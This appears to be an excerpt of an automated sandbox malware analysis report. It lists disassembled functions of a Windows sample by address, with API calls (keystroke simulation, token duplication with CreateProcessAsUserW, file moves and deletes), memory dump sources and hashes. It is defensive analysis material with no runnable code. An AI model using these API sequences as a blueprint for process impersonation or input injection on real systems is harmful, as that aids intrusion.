                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                                                                          • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
                                                                          • Opcode Fuzzy Hash: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                                                                          • Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
                                                                          Function 0045E17D Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
                                                                          • Instruction ID: fe3c5e01fee558804f1d0cd68762aa03bf47037873853bda5dcd607d85013340
                                                                          • Opcode Fuzzy Hash: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
                                                                          • Instruction Fuzzy Hash: 2D118B352046019FDB10DF69D884E96B3E9AF8A314F14856EFD298B362CB35FC41CB95
                                                                          Function 00414C76 Relevance: 1.5, APIs: 1, Instructions: 40COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: __lock_file
                                                                          • String ID:
                                                                          • API String ID: 3031932315-0
                                                                          • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                          • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                                                                          • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                          • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                                                                          Function 00443E36 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,004263D0,?,00487ACC,00000003,0040DE90,?,?,00000001), ref: 00443E54
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite
                                                                          • String ID:
                                                                          • API String ID: 3934441357-0
                                                                          • Opcode ID: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                                          • Instruction ID: f8d6e32d6ecef3e6c51c5ea05c7ff41eb941b2b6d152ec47b845c679c5cedb0e
                                                                          • Opcode Fuzzy Hash: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                                          • Instruction Fuzzy Hash: 6BE01276100318ABDB10DF98D844FDA77BCEF48765F10891AFA048B200C7B4EA908BE4
                                                                          Function 004149C2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: __wfsopen
                                                                          • String ID:
                                                                          • API String ID: 197181222-0
                                                                          • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                          • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                                                                          • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                          • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                                                                          Function 0040DA20 Relevance: 1.3, APIs: 1, Instructions: 22COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CloseHandle.KERNELBASE(?,?,00426FBF), ref: 0040DA3D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandle
                                                                          • String ID:
                                                                          • API String ID: 2962429428-0
                                                                          • Opcode ID: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                                          • Instruction ID: 552ddd844a8bbede063c80161f66c4637379340f91e2bb70a518b226642b2913
                                                                          • Opcode Fuzzy Hash: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                                          • Instruction Fuzzy Hash: B9E045B4A04B008BC6308F5BE444416FBF8EEE46203108E1FD4A6C2A64C3B4A1498F50
                                                                          Function 04198B00 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • Sleep.KERNELBASE(000001F4), ref: 04198B11
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1796927898.0000000004196000.00000040.00000020.00020000.00000000.sdmp, Offset: 04196000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4196000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID:
                                                                          • API String ID: 3472027048-0
                                                                          • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                          • Instruction ID: 378e708ec0c12b7867c8aae01daf4d68a44c5ceaee3102317e433d3e720ec48c
                                                                          • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                          • Instruction Fuzzy Hash: 97E0BF7494010D9FDB00EFB4D54969E7BB4EF04301F100561FD0192280D7309D508A62

                                                                          Non-executed Functions

                                                                          Function 0047C81C Relevance: 74.2, APIs: 40, Strings: 2, Instructions: 674windowkeyboardCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                                                          • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                                                                          • GetKeyState.USER32(00000011), ref: 0047C92D
                                                                          • GetKeyState.USER32(00000009), ref: 0047C936
                                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                                                          • GetKeyState.USER32(00000010), ref: 0047C953
                                                                          • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                                                                          • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                                                          • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                                                          • _wcsncpy.LIBCMT ref: 0047CA29
                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                                                          • SendMessageW.USER32 ref: 0047CA7F
                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                                                          • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                                                          • ImageList_SetDragCursorImage.COMCTL32(00A8EFD8,00000000,00000000,00000000), ref: 0047CB9B
                                                                          • ImageList_BeginDrag.COMCTL32(00A8EFD8,00000000,000000F8,000000F0), ref: 0047CBAC
                                                                          • SetCapture.USER32(?), ref: 0047CBB6
                                                                          • ClientToScreen.USER32(?,?), ref: 0047CC17
                                                                          • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                                                                          • ReleaseCapture.USER32 ref: 0047CC3A
                                                                          • GetCursorPos.USER32(?), ref: 0047CC72
                                                                          • ScreenToClient.USER32(?,?), ref: 0047CC80
                                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                                                          • SendMessageW.USER32 ref: 0047CD12
                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                                                          • SendMessageW.USER32 ref: 0047CD80
                                                                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                                                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                                                          • GetCursorPos.USER32(?), ref: 0047CDC8
                                                                          • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                                                          • GetParent.USER32(00000000), ref: 0047CDF7
                                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                                                          • SendMessageW.USER32 ref: 0047CE93
                                                                          • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,009C1AC0,00000000,?,?,?,?), ref: 0047CF1C
                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                                                          • SendMessageW.USER32 ref: 0047CF6B
                                                                          • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                                                          • TrackPopupMenuEx.USER32(?,00000080,?,?,009C1AC0,00000000,?,?,?,?), ref: 0047CFE6
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                          • String ID: @GUI_DRAGID$F
                                                                          • API String ID: 3100379633-4164748364
                                                                          • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                          • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                                                          • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                          • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                                                          Function 00434418 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 133keyboardthreadwindowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetForegroundWindow.USER32 ref: 00434420
                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                                                          • IsIconic.USER32(?), ref: 0043444F
                                                                          • ShowWindow.USER32(?,00000009), ref: 0043445C
                                                                          • SetForegroundWindow.USER32(?), ref: 0043446A
                                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00434485
                                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                                                          • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                                                          • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                                                          • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                                                          • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                                                          • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                                                          • keybd_event.USER32(00000012,00000000), ref: 00434514
                                                                          • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                                                          • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                          • String ID: Shell_TrayWnd
                                                                          • API String ID: 2889586943-2988720461
                                                                          • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                          • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                                                          • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                          • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                                                          Function 00446313 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 234processCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                                                          • CloseHandle.KERNEL32(?), ref: 004463A0
                                                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                                                          • GetProcessWindowStation.USER32 ref: 004463D1
                                                                          • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                                                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                                                          • _wcslen.LIBCMT ref: 00446498
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • _wcsncpy.LIBCMT ref: 004464C0
                                                                          • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                                                          • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                                                          • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                                                          • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                                                          • CloseWindowStation.USER32(00000000), ref: 0044656C
                                                                          • CloseDesktop.USER32(?), ref: 0044657A
                                                                          • SetProcessWindowStation.USER32(?), ref: 00446588
                                                                          • CloseHandle.KERNEL32(?), ref: 00446592
                                                                          • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                                                                          • String ID: $@OH$default$winsta0
                                                                          • API String ID: 3324942560-3791954436
                                                                          • Opcode ID: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                                                                          • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                                                          • Opcode Fuzzy Hash: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                                                                          • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                                                          Function 004096A0 Relevance: 33.9, APIs: 21, Instructions: 2413COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _wcslen.LIBCMT ref: 004096C1
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • _memmove.LIBCMT ref: 0040970C
                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                            • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                          • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                                                          • _memmove.LIBCMT ref: 00409D96
                                                                          • _memmove.LIBCMT ref: 0040A6C4
                                                                          • _memmove.LIBCMT ref: 004297E5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                                                          • String ID:
                                                                          • API String ID: 2383988440-0
                                                                          • Opcode ID: e127891bc0a98d019add158fe61e22172890978285290b421ac62a594046158c
                                                                          • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                                                          • Opcode Fuzzy Hash: e127891bc0a98d019add158fe61e22172890978285290b421ac62a594046158c
                                                                          • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B
                                                                          Function 0044BD27 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 178filestringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                            • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 0043392E
                                                                            • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 00433950
                                                                            • Part of subcall function 00433908: __wcsicoll.LIBCMT ref: 00433974
                                                                            • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                          • _wcscat.LIBCMT ref: 0044BD94
                                                                          • _wcscat.LIBCMT ref: 0044BDBD
                                                                          • __wsplitpath.LIBCMT ref: 0044BDEA
                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
                                                                          • _wcscpy.LIBCMT ref: 0044BE71
                                                                          • _wcscat.LIBCMT ref: 0044BE83
                                                                          • _wcscat.LIBCMT ref: 0044BE95
                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
                                                                          • DeleteFileW.KERNEL32(?), ref: 0044BED3
                                                                          • MoveFileW.KERNEL32(?,?), ref: 0044BEF3
                                                                          • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
                                                                          • DeleteFileW.KERNEL32(?), ref: 0044BF15
                                                                          • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
                                                                          • FindClose.KERNEL32(00000000), ref: 0044BF33
                                                                          • MoveFileW.KERNEL32(?,?), ref: 0044BF4F
                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
                                                                          • FindClose.KERNEL32(00000000), ref: 0044BF7C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                                                          • String ID: \*.*
                                                                          • API String ID: 2188072990-1173974218
                                                                          • Opcode ID: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                                          • Instruction ID: 72a2fd59153234373391f972af8bc7e503bf673df65afccb4f4ecee040a4f935
                                                                          • Opcode Fuzzy Hash: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                                          • Instruction Fuzzy Hash: E25167B2408384AAD734DB50DC45EDF73E9AFC8304F544E1EF68982141EB75D249CBA6
                                                                          Function 004788BD Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 217timefileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                                                          • FindClose.KERNEL32(00000000), ref: 00478924
                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
